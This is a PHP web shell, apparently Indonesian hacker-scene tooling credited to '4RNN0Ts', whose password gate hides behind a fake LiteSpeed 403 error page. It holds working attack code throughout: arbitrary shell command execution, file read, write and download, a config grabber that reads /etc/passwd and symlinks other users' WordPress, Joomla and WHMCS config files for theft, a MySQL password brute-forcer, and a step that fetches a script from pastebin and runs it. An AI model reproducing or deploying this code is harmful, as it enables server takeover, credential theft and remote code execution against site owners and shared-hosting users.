shell mini ajaib :v

1. <html>
2. <?php
3. @session_start();
4. @error_reporting(0);
5. @error_log(0);
6. @ini_set('error_log',NULL);
7. @ini_set('log_errors',0);
8. @ini_set('max_execution_time',0);
9. @ini_set('output_buffering',0);
10. @ini_set('display_errors', 0);
11. @set_time_limit(0);
12. @set_magic_quotes_runtime(0);
13. $lol=""; //mana saia tau
14. function printLogin() {
15. ?>
16. <head>
17. <meta charset="UTF-8">
18. <title> 403 Forbidden
19. </title></head>
20. <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
21. <div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
22. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">403</h1>
23. <h2 style="margin-top:20px;font-size: 30px;">Forbidden
24. </h2>
25. <p>Access to this resource on the server is denied!</p>
26. </div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;">
27. <br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
28. </head>
29. <style>
30. input { margin:0;background-color:#fff;border:1px solid #fff; }
31. </style>
32. <center>
33. <form method=post>
34. <input type=password name=jancox>
35. </form></center>
36. <?php
37. exit;
38. }
39. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
40. if( empty( $lol ) ||
41. ( isset( $_POST['jancox'] ) && ( md5($_POST['jancox']) == $lol ) ) )
42. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
43. else
44. printLogin();
45. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
46. @ob_clean();
47. $file = $_GET['file'];
48. header('Content-Description: File Transfer');
49. header('Content-Type: application/octet-stream');
50. header('Content-Disposition: attachment; filename="'.basename($file).'"');
51. header('Expires: 0');
52. header('Cache-Control: must-revalidate');
53. header('Pragma: public');
54. header('Content-Length: ' . filesize($file));
55. readfile($file);
56. exit;
57. }
58.  
59. ?>
60. <!DOCTYPE HTML>
61. <html lang="en" class="no-js">
62. <HEAD>
63. <script type="text/javascript">
64.  
65. var reps = 2
66. var speed =20
67. var p=message.length;
68. var T="";
69. var C=0;
70. var mC=0;
71. var s=0;
72. var sT=null;
73. if(reps<1)reps=1;
74. function doTheThing(){
75. T=message[mC];
76. A();}
77. function A(){
78. s++
79. if(s>9){s=1}
80. if(s==1){document.title=' '+T+' '}
81. if(C<(8*reps)){
82. sT=setTimeout("A()",speed);
83. C++
84. }else{
85. C=0;
86. s=0;
87. mC++
88. if(mC>p-1)mC=0;
89. sT=null;
90. doTheThing();}}
91. doTheThing();
92. </script>
93. <link href="http://fonts.googleapis.com/css?family=Fredericka+the+Great" rel="stylesheet" type="text/css">
94. <link href="http://fonts.googleapis.com/css?family=Jolly+Lodger" rel="stylesheet" type="text/css">
95. <link href="http://fonts.googleapis.com/css?family=Homenaje" rel="stylesheet" type="text/css">
96. <link rel="shortcut icon" href="http://www.gambaranimasi.org/data/media/781/animasi-bergerak-bendera-indonesia-0013.gif" type="image/x-icon">
97. <meta name='author' content='4RNN0Ts'>
98. <meta charset="UTF-8">
99. <style type="text/css">
100. body {
101. background: #000000;
102. color: springgreen;
103. font-family :Homenaje;
104. }
105.  
106. #bawah{
107. margin-bottom: 50px;
108. }
109.  
110. #content .first {
111. background-color: black;
112. }
113.  
114. a {
115. color: white;
116. text-decoration: none;
117. }
118.  
119. input,select,textarea{
120. border: 1px #000000 solid;
121. -moz-border-radius: 5px;
122. -webkit-border-radius:5px;
123. border-radius:5px;
124. }
125.  
126. #menu {
127. background:#000000;
128. margin:8px 2px 4px 2px;
129. font-family:Fredericka the Great;
130. font-size:14px;
131. color:silver;
132. }
133.  
134. #menu a {
135. padding:3px 6px;
136. margin:1;
137. background:#2d2b2b;
138. text-decoration:none;
139. letter-spacing:2px;
140. -moz-border-radius: 10px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
141. }
142.  
143. #menu a:hover {
144. background:black;
145. border-bottom:1px solid #ffffff;
146. border-top:1px solid #ffffff;
147. }
148.  
149. .tombolupil {
150. background:black;
151. color:white;
152. margin:0 10px;
153. font-family:Homenaje;
154. font-size:16px;
155. border:2px solid crimson;
156. }
157.  
158. .tombolupil:hover {
159. background:crimson;
160. color:white;
161. margin:0 10px;
162. font-family:Homenaje;
163. font-size:16px;
164. border:2px solid crimson;
165. }
166.  
167. .bordergaya {
168. background:black;
169. color:white;
170. margin:0 10px;
171. font-family:Homenaje;
172. font-size:16px;
173. border:2px solid #2d2b2b;
174. }
175.  
176. .bordergaya:hover {
177. background:#2d2b2b;
178. color:white;
179. margin:0 10px;
180. font-family:Homenaje;
181. font-size:16px;
182. border:2px solid crimson;
183. }
184.  
185. .justborder {
186. background:black;
187. color:white;
188. margin:0 10px;
189. font-family:Homenaje;
190. font-size:16px;
191. border:2px solid #2d2b2b;
192. }
193.  
194. .rapihbanget {
195. text-align: left;
196. font-size: 16px;
197. color: springgreen;
198. font-family: Homenaje;
199. margin-left: 38%;
200. }
201.  
202. .kecew {
203. text-align: left;
204. font-size: 15px;
205. color: white;
206. font-family: Homenaje;
207. }
208.  
209. /* STYLE UPIL BIAR KEKINIAN */
210.  
211. .js .inputfile{
212. width: 0.1px;
213. height: 0.1px;
214. opacity: 0;
215. overflow: hidden;
216. position: absolute;
217. z-index: -1;
218. }
219.  
220. .inputfile + label {
221. max-width: 80%;
222. font-size: 1.25rem;
223. /* 20px */
224. font-weight: 700;
225. text-overflow: ellipsis;
226. white-space: nowrap;
227. cursor: pointer;
228. display: inline-block;
229. overflow: hidden;
230. padding: 0.625rem 1.25rem;
231. /* 10px 20px */
232. }
233.  
234. .no-js .inputfile + label {
235. display: none;
236. }
237.  
238. .inputfile:focus + label,
239. .inputfile.has-focus + label {
240. outline: 1px dotted #000;
241. outline: -webkit-focus-ring-color auto 5px;
242. }
243.  
244. .inputfile + label * {
245. /* pointer-events: none; */
246. /* in case of FastClick lib use */
247. }
248.  
249. .inputfile + label svg {
250. width: 1em;
251. height: 1em;
252. vertical-align: middle;
253. fill: currentColor;
254. margin-top: -0.25em;
255. /* 4px */
256. margin-right: 0.25em;
257. /* 4px */
258. }
259.  
260. .inputfile-4 + label {
261. color: white;
262. font-family:Homenaje;
263. font-size:15px;
264. }
265.  
266. .inputfile-4:focus + label,
267. .inputfile-4.has-focus + label,
268. .inputfile-4 + label:hover {
269. color: crimson;
270. }
271.  
272. .inputfile-4 + label figure {
273. width: 50px;
274. height: 50px;
275. border-radius: 25%;
276. background-color: crimson;
277. display: block;
278. padding: 10px;
279. margin: 0 auto 10px;
280. }
281.  
282. .inputfile-4:focus + label figure,
283. .inputfile-4.has-focus + label figure,
284. .inputfile-4 + label:hover figure {
285. background-color: white;
286. }
287.  
288. .inputfile-4 + label svg {
289. width: 100%;
290. height: 100%;
291. fill: black;
292. }
293.  
294. </style>
295. </HEAD>
296. <BODY>
297. <center>
298. <?php
299. /*
300. @4RNN0Ts
301. Recode By @4RNN0Ts
302. */
303.  
304. /*
305. Thanks To : StupidCodeShell
306. */
307.  
308. set_time_limit(0);
309. error_reporting(0);
310. if(get_magic_quotes_gpc()){
311. foreach($_POST as $key=>$value){
312. $_POST[$key] = stripslashes($value);
313. }
314. }
315.  
316. /* info server */
317.  
318. $self=$_SERVER['PHP_SELF'];
319. $srvr_sof=$_SERVER['SERVER_SOFTWARE'];
320. $your_ip=$_SERVER['REMOTE_ADDR'];
321. $srvr_ip=$_SERVER['SERVER_ADDR'];
322. $admin=$_SERVER['SERVER_ADMIN'];
323.  
324.  
325. //////all functions disini tempatnya/////
326. function exe($cmd) {
327. if(function_exists('system')) {
328. @ob_start();
329. @system($cmd);
330. $buff = @ob_get_contents();
331. @ob_end_clean();
332. return $buff;
333. } elseif(function_exists('exec')) {
334. @exec($cmd,$results);
335. $buff = "";
336. foreach($results as $result) {
337. $buff .= $result;
338. } return $buff;
339. } elseif(function_exists('passthru')) {
340. @ob_start();
341. @passthru($cmd);
342. $buff = @ob_get_contents();
343. @ob_end_clean();
344. return $buff;
345. } elseif(function_exists('shell_exec')) {
346. $buff = @shell_exec($cmd);
347. return $buff;
348. }
349. }
350.  
351. function perms($file){
352. $perms = fileperms($file);
353.  
354.  
355. if (($perms & 0xC000) == 0xC000) {
356. // Socket
357. $info = 's';
358. } elseif (($perms & 0xA000) == 0xA000) {
359. // Symbolic Link
360. $info = 'l';
361. } elseif (($perms & 0x8000) == 0x8000) {
362. // Regular
363. $info = '-';
364. } elseif (($perms & 0x6000) == 0x6000) {
365. // Block special
366. $info = 'b';
367. } elseif (($perms & 0x4000) == 0x4000) {
368. // Directory
369. $info = 'd';
370. } elseif (($perms & 0x2000) == 0x2000) {
371. // Character special
372. $info = 'c';
373. } elseif (($perms & 0x1000) == 0x1000) {
374. // FIFO pipe
375. $info = 'p';
376. } else {
377. // Unknown
378. $info = 'u';
379. }
380.  
381. // Owner
382. $info .= (($perms & 0x0100) ? 'r' : '-');
383. $info .= (($perms & 0x0080) ? 'w' : '-');
384. $info .= (($perms & 0x0040) ?
385. (($perms & 0x0800) ? 's' : 'x' ) :
386. (($perms & 0x0800) ? 'S' : '-'));
387.  
388. // Group
389. $info .= (($perms & 0x0020) ? 'r' : '-');
390. $info .= (($perms & 0x0010) ? 'w' : '-');
391. $info .= (($perms & 0x0008) ?
392. (($perms & 0x0400) ? 's' : 'x' ) :
393. (($perms & 0x0400) ? 'S' : '-'));
394.  
395. // World
396. $info .= (($perms & 0x0004) ? 'r' : '-');
397. $info .= (($perms & 0x0002) ? 'w' : '-');
398. $info .= (($perms & 0x0001) ?
399. (($perms & 0x0200) ? 't' : 'x' ) :
400. (($perms & 0x0200) ? 'T' : '-'));
401.  
402. return $info;
403. }
404.  
405. function getfile($urlfile, $content) {
406. $fp = fopen($content, "w");
407. $ch = curl_init();
408. curl_setopt($ch, CURLOPT_URL, $urlfile);
409. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
410. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
411. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
412. curl_setopt($ch, CURLOPT_FILE, $fp);
413. return curl_exec($ch);
414. curl_close($ch);
415. fclose($fp);
416. ob_flush();
417. flush();
418. }
419. //////////////END Functions Biar Rapih////////////////////
420.  
421. ///////////////////ZONE-H////////////////
422. $zoneH="lVRti9s4EP4eyH+YimUdQxrvbqF3JLa5ct1Cub3dkqRf7lKC4kxisbJkJLlJWva/d+SXJu1uaWsIkUbz8swzj4RZrlm/F2eoHJo03mhTQIEu1+tkwd7dzeYLlvZ7/wpjtIExeVqUmDnIJLc2CVbarNFs+YEHoHiBFFTUvnVYrEsntEo/aYXP8zhqt3QQNWnSeGVoe6ud2KCBW8owhliosuoqLNixxIKBO5S+hsO9o10peYa5lnTu0VbO8OevnOPZPRKADtAaN+TmDVZ88oYXV4SuqfxaF1woC2O/jX1abpA/Xdu6g/ThO7F2+Rhe/vFnuZ9AjmKbuzG8uLii7UnVJrOvFHV526K/0KCtVoXwLX7ksvKGGar1MflWN/xGfl5+4dHTj036Pej3LLqlEwUupaAsMLgIyS42MHi2qVTmZ7DEvbDOwoBllZFLoYRjYfh5LZBM81xYmGVGlA4qixay99MbuBErw81hCAddQVFZB9Se41LCRhjaPatBcMgNbpIgd64cRxGvrkZlXo4UuqjgquIyQhX5miMCWZX+MEh/wzmOeMrCyUPdp2/pr7Oll+n/wVYHH8J+7zOdtB+RgzzLYYD7Uuq1b22h2BC6iHZEFAbcwlmzDY/xJ6m6r9TU6aB1PcnUSCz4cDQ114ByT45ZHo5LpIsHrJsb0UYC2aJLguVKcnUffEtjc4FGmS4ibrJcfMSorFZS2BzXyUWQ/tdeMP5VBQ1B3bg73EQlIWzR0qoB+S1rZ8RYAl9lAYPTDmozDYNuMqXL8iH8Tdq4ezdfTq/n76e38+mr29mb6+kQLn8tzJPVOR/97U44P7gjwCdmknGLwBpq2OTxrH5clP6GwFpud7vd6IRf5d+iQ2SF2kpk4W/l9c28eXt983pG6VuWk47u80Y0l4mfwnlOj1RBmkwuz0mkVqvk8sliXuKlwe2y4DUjLMq01P65M0gPQnr3T7ygV0DRU7qIpEgj0ncNEPeY1fDCMHyc9jsZtreWjZgHR3+dHGnZCJIWaWxLrtpnMKhhjGFrEFWQ+jAgLJF3SU+F+KiitPhTPE8UonbbMtdeEl2lH1RZEan3J3Y/g0q68c89H75TbSY1yawm0l+rLw== ";
423.  
424.  
425. /*MASIH STYLE UPIL BRO*/
426.  
427. echo '<script>(function(e,t,n){var r=e.querySelectorAll("html")[0];r.className=r.className.replace(/(^|\s)no-js(\s|$)/,"$1js$2")})(document,window,0);</script>';
428.  
429. echo"<br/>
430. <pre style='text-align: center; color: grey; font-weight: bold; font-size: 15px;'>
431. *-~'`^'*u_ _u*'^`'~-*,
432. p!^ / jPw w9j \ ^!p
433. w^.._ / '\_ _/' \ _.^w
434. *_ / \_ _ _ _/ \ _*
435. q / / \q ( '---' ) p/ \ \ p
436. jj5****._ / ^\_) o o (_/^ \ _.****6jj
437. *_ / '==) ;; (==' \ _*
438. `/.w***, /( )\ ,***w.\'
439. ^ ^c/ ) ( \c^ ^
440. 'V')_)(_('V'</pre>";
441.  
442. echo "<center><font color='silver' siz='4px' face='Fredericka the Great'>[+] By @4RNN0Ts [+]</font></center><br/>";
443.  
444. /** info kernel */
445. echo"
446. <font size='4' color='White' face='Jolly Lodger'>
447. <center>".php_uname()."<br>
448. ".$software = getenv("SERVER_SOFTWARE");
449. echo"<p>";
450.  
451. echo"
452. <font size='3.5' color='white'><p>
453. Your IP : <font color=Crimson> ".$your_ip."</font> <font color=springgreen>|</font> <font color=\"#fff2f2\" > </font> Server IP : <font color=Crimson>".$srvr_ip."</font> <font color=\"#fff2f2\" ><br>
454.  
455. </font>
456. </font>
457. </div>
458. </td>
459. </tr>
460. </tbody>
461. </table></div>
462. </font>";
463.  
464. $disablefunctions = @ini_get("disable_functions");
465. $echo_disablefunctions = (!empty($disablefunctions)) ? "<font color=white>".$disablefunctions."</font>" : "<font color=white>Have Fun! None Functions Disabled For This Server! ~_^</font>";
466. echo '<br/><font size="4" style="font-family:Jolly Lodger; color:red;">
467. <tr><td> Disable Functions: '.$echo_disablefunctions.'</font><br/></td></tr>';
468.  
469.  
470. echo '<br/><font size="4" style="font-family:Jolly Lodger;">
471. <tr><td> Your Path Location :';
472.  
473. //////////////////////
474. //CWD MULAI DISINI//
475. ////////////////////
476.  
477. if(isset($_GET['path'])){
478. $path = $_GET['path'];
479. }else{
480. $path = getcwd();
481. }
482. $path = str_replace('\\','/',$path);
483. $paths = explode('/',$path);
484.  
485. foreach($paths as $id=>$pat){
486. if($pat == '' && $id == 0){
487. $a = true;
488. echo '<a href="?path=/">/</a>';
489. continue;
490. }
491. if($pat == '') continue;
492. echo '<a href="?path=';
493. for($i=0;$i<=$id;$i++){
494. echo "$paths[$i]";
495. if($i != $id) echo "/";
496. }
497. echo '">'.$pat.'</a>/';
498. }
499. echo '</font>';
500. $putraganteng=getcwd();
501. $putraganteng=$path;
502. ?>
503.  
504. <?php
505.  
506. ## Update Penambahan Fitur Create New File And Folder (Bagian Interface)
507. echo"<center>
508. <table>
509. <tr>
510. <td>
511. <form style='float:right;' method='POST'><input name='path' value=".$putraganteng." type=hidden>
512. <input class=bordergaya type='submit' value='Create New File' >
513. <input class=bordergaya size='40' name='new_file' /></form>
514. </td>
515. <td>
516. <form style='float:left;' method='POST'><input name='path' value=".$putraganteng." type=hidden>
517. <input class=bordergaya size='40' name='new_dir'>
518. <input class=bordergaya type='submit' value='Create New Folder' /></form>
519. </td>
520. </tr>
521. </table>
522. </center>";
523. ## End Of Update Interface
524. ## Update Penambahan Fitur Create New File And Folder (Bagian Function)
525. function mk_file_ui(){
526. chdir($_POST['path']);
527. echo "<font color='springgreen'><form method='POST'>
528. <input type='hidden' name='path' value=".getcwd().">
529. <br/>New File Name : <input class=bordergaya size='40' name='new_f_name' value=".$_POST['new_file']."></font><br /><br /><center>
530. <textarea spellcheck='false' cols='80' rows='15' class=bordergaya name='n_file_content'></textarea></center><br>
531. <input class='bordergaya' type='submit' value=' Save ' /></form></center></div>";
532. die();
533. }
534.  
535. function mk_file_bg(){
536. chdir($_POST['path']);
537. $c_path=$_POST['path'];
538. $c_file=$_POST['new_f_name'];
539. $c_file_contents=$_POST['n_file_content'];
540. $handle=fopen($c_file, "w");
541. if(!$handle){
542. echo '<script>alert("Failed :(");</script>';
543. }else{
544. fwrite($handle,$c_file_contents);
545. echo '<script>alert("File Saved!!");</script>';
546. }
547. fclose($handle);
548. }
549.  
550. function create_dir(){
551. chdir($_POST['path']);
552. $new_dir=$_POST['new_dir'];
553. if(is_writable($_POST['path'])){
554. mkdir($new_dir);
555. echo '<script>alert("Creating Folder Success!!");</script>';
556. }else{
557. echo '<script>alert("Creating Folder Failed!!");</script>';
558. }
559. }
560. ## End Of Update Functions
561. ?>
562.  
563. <!-- menu utama -->
564. <br><center><div id="menu">
565. [<a href="?">Home</a>] <font color=orange>=</font>
566. [<a href="?<?php echo "path=".$path; ?>&amp;x=korong">Upload</a>] <font color=orange>=</font>
567. [<a href="?<?php echo "path=".$path; ?>&amp;x=cmd">Command</a>] <font color=orange>=</font>
568. [<a href="?<?php echo "path=".$path; ?>&amp;x=grabc">Config Grabber</a>] <font color=orange>=</font>
569. [<a href="?<?php echo "path=".$path; ?>&amp;x=vn">Domain Viewer</a>] <font color=orange>=</font>
570. [<a href="?<?php echo "path=".$path; ?>&amp;x=masstool">Mass Tool</a>] <font color=orange>=</font>
571. [<a href="?<?php echo "path=".$path; ?>&amp;x=cpanel">Cpanel Tool</a>]
572. <br><br>
573. [<a href="?<?php echo "path=".$path; ?>&amp;x=bypstuls">Bypass Tools</a>] <font color=orange>=</font>
574. [<a href="?<?php echo "path=".$path; ?>&amp;x=fcrot">File Creator</a>] <font color=orange>=</font>
575. [<a href="?<?php echo "path=".$path; ?>&amp;x=krdp">Create RDP</a>] <font color=orange>=</font>
576. [<a href="?<?php echo "path=".$path; ?>&amp;x=jumping">Jumping</a>] <font color=orange>=</font>
577. [<a href="?<?php echo "path=".$path; ?>&amp;x=dump">Dumper Tools</a>] <font color=orange>=</font>
578. [<a href="?<?php echo "path=".$path; ?>&amp;x=tentang">About</a>]
579. </div></center>
580. <audio autoplay> <source src="http://www.soundjay.com/button/beep-24.wav" type="audio/mpeg"></audio>
581.  
582. <?php
583.  
584. /*
585. Lihat File
586. Dimulai Dari Sini
587. */
588.  
589. if(isset($_GET['filesrc'])){
590. echo "<br /><tr><td>You Are Looking : ";
591. echo $_GET['filesrc'];
592. echo '</tr></td></table>';
593. echo('<br /><br /><textarea rows="20" cols="80">'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
594. die();
595. }
596.  
597. ## Update Penambahan Fitur Create New File And Folder (Bagian If dan Else)
598. else if(isset($_POST['path']) && isset($_POST['new_file'])){
599. chdir($_POST['path']);
600. mk_file_ui();
601. }else if(isset($_POST['path']) && isset($_POST['new_f_name']) && isset($_POST['n_file_content'])){
602. mk_file_bg();
603. }else if(isset($_POST['path']) && isset($_POST['new_dir'])){
604. chdir($_POST['path']);
605. create_dir();
606. }
607. ## End Of Update
608.  
609. /*
610. permission + Rename
611. Dimulai Dari Sini
612. */
613.  
614. elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
615. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
616. if($_POST['opt'] == 'chmod'){
617. if(isset($_POST['perm'])){
618. if(chmod($_POST['path'],$_POST['perm'])){
619. echo '<script>alert("Change Permission Sukses!");</script>';
620. }else{
621. echo '<script>alert("Change Permission Gagal!");</script>';
622. }
623. }
624. echo '<form method="POST">
625. Permission : <input name="perm" class="bordergaya" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
626. <input type="hidden" name="path" value="'.$_POST['path'].'">
627. <input type="hidden" name="opt" value="chmod">
628. <input class="bordergaya" type="submit" value="Go" />
629. </form>';
630. }elseif($_POST['opt'] == 'rename'){
631. if(isset($_POST['newname'])){
632. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
633. echo '<script>alert("Change Name Sukses!");</script>';
634. }else{
635. echo '<script>alert("Change Name Gagal!");</script>';
636. }
637. $_POST['name'] = $_POST['newname'];
638. }
639. echo '<form method="POST">
640. New Name : <input class="bordergaya" name="newname" type="text" size="20" value="'.$_POST['name'].'" />
641. <input type="hidden" name="path" value="'.$_POST['path'].'">
642. <input type="hidden" name="opt" value="rename">
643. <input class="bordergaya" type="submit" value="Go" />
644. </form>';
645. }elseif($_POST['opt'] == 'edit'){
646. if(isset($_POST['src'])){
647. $fp = fopen($_POST['path'],'w');
648. if(fwrite($fp,$_POST['src'])){
649. echo '<script>alert("Edit File Sukses!");</script>';
650. }else{
651. echo '<script>alert("Edit File Gagal!");</script>';
652. }
653. fclose($fp);
654. }
655. echo '<form method="POST">
656. <textarea class="bordergaya" cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
657. <input type="hidden" name="path" value="'.$_POST['path'].'">
658. <input type="hidden" name="opt" value="edit">
659. <input class="bordergaya" type="submit" value="Go" />
660. </form>';
661. }
662. echo '</center>';
663. die();
664. }
665.  
666.  
667. /*
668. Config Grabber
669. Dimulai Dari Sini
670. */
671.  
672. elseif(isset($_GET['x']) && ($_GET['x'] == 'grabc')){ @ini_set('output_buffering',0);
673.  
674. echo "
675. <form method='POST'>
676. </head>
677. <style>
678. textarea {
679. resize:none;
680. color: #000000 ;
681. background-color:#000000;
682. font-size:8pt; color:#ffffff;
683. border:1px solid white ;
684. border-left: 4px solid white ;
685. width:543px;
686. height:400px;
687. }
688. input {
689. color: #000000;
690. border:1px dotted white;
691. }
692. </style>";
693. echo "<center>";?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Homenaje" color="springgreen" size="2pt">/etc/passwd content</p><br><form method="POST"><textarea name="passwd" class='bordergaya' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" class='bordergaya' size="100" value="Grab!" type="submit"><br></form></center><br><?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('I-Conf', 0755);@chdir('I-Conf');
694. $htaccess="
695. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
696. Options Indexes FollowSymLinks
697. ForceType text/plain
698. AddType text/plain .php
699. AddType text/plain .html
700. AddType text/html .shtml
701. AddType txt .php
702. AddHandler server-parsed .php
703. AddHandler txt .php
704. AddHandler txt .html
705. AddHandler txt .shtml
706. Options All
707. Options All";
708. file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
709. $passwd=explode("\n",$passwd);
710. echo "<br><br><center><font face='Homenaje' color=Crimson size=2pt>Ngkosek Tungguk i yoo</center><br>";
711. foreach($passwd as $pwd){
712. $pawd=explode(":",$pwd);$user =$pawd[0];
713. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
714. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
715. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
716. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
717. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
718. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
719. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
720. @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
721. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
722. @symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
723. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
724. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
725. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
726. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
727. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
728. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
729. @symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
730. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
731. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
732. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
733. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
734. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
735. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
736. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
737. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
738. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
739. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
740. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
741. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
742. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
743. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
744. @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
745. @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
746. @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
747. @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
748. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
749. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
750. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
751. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
752. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
753. echo '<b><font face="Homenaje" color="springgreen" size="3pt"><b>Selesai Bos Q, Monggo >></b> <a target="_blank" href="I-Conf">Hajar Config</a></font></b>';}
754. die();
755. }
756. /////// Cukup Sampai Disini ya Grabber :( ////////
757.  
758. /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
759. ///////////////////////////////////////////////START OF ALL CPANEL TOOLS/////////////////////////////////////////////////////////////////////
760. /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
761.  
762.  
763. /// start cpanel brute
764. elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
765. {
766. ?>
767. <form action="?path=<?php echo $path; ?>&amp;x=brute" method="post">
768. <?php
769.  
770. @set_time_limit(0);
771. @error_reporting(0);
772.  
773.  
774. if($_POST['page']=='find')
775. {
776. if(isset($_POST['usernames']) && isset($_POST['passwords']))
777. {
778. if($_POST['type'] == 'passwd'){
779. $e = explode("\n",$_POST['usernames']);
780. foreach($e as $value){
781. $k = explode(":",$value);
782. $username .= $k['0']." ";
783. }
784. }elseif($_POST['type'] == 'simple'){
785. $username = str_replace("\n",' ',$_POST['usernames']);
786. }
787. $a1 = explode(" ",$username);
788. $a2 = explode("\n",$_POST['passwords']);
789. $id2 = count($a2);
790. $ok = 0;
791. foreach($a1 as $user )
792. {
793. if($user !== '')
794. {
795. $user=trim($user);
796. for($i=0;$i<=$id2;$i++)
797. {
798. $pass = trim($a2[$i]);
799. if(@mysql_connect('localhost',$user,$pass))
800. {
801. echo "Zoo!! ~ user is (<b><font color=white>$user</font></b>) Password is (<b><font color=white>$pass</font></b>)<br />";
802. $ok++;
803. }
804. }
805. }
806. }
807. echo "<hr><b>You Found <font color=red>$ok</font> By 4RNN0Ts</b>";
808. echo "<center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
809. exit;
810. }
811. }
812. if($_POST['pass']=='password'){
813. @error_reporting(0);
814. $i = getenv('REMOTE_ADDR');
815. $d = date('D, M jS, Y H:i',time());
816. $h = $_SERVER['HTTP_HOST'];
817. $dir=$_SERVER['PHP_SELF'];
818. mkdir('config',0755);
819. $cp = file_get_contents("http://pastebin.com/raw/0YG2dZ98");
820. $file = fopen("cp.py","w+");
821. $write = fwrite ($file ,$cp);
822. fclose($file);
823. chmod("cp.py",0755);
824. $url = $_POST['url'];
825. echo"<center>
826. <textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
827. system("python cp.py $url config");
828. unlink ('cp.py');
829. echo"</textarea>
830. </center>";
831. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
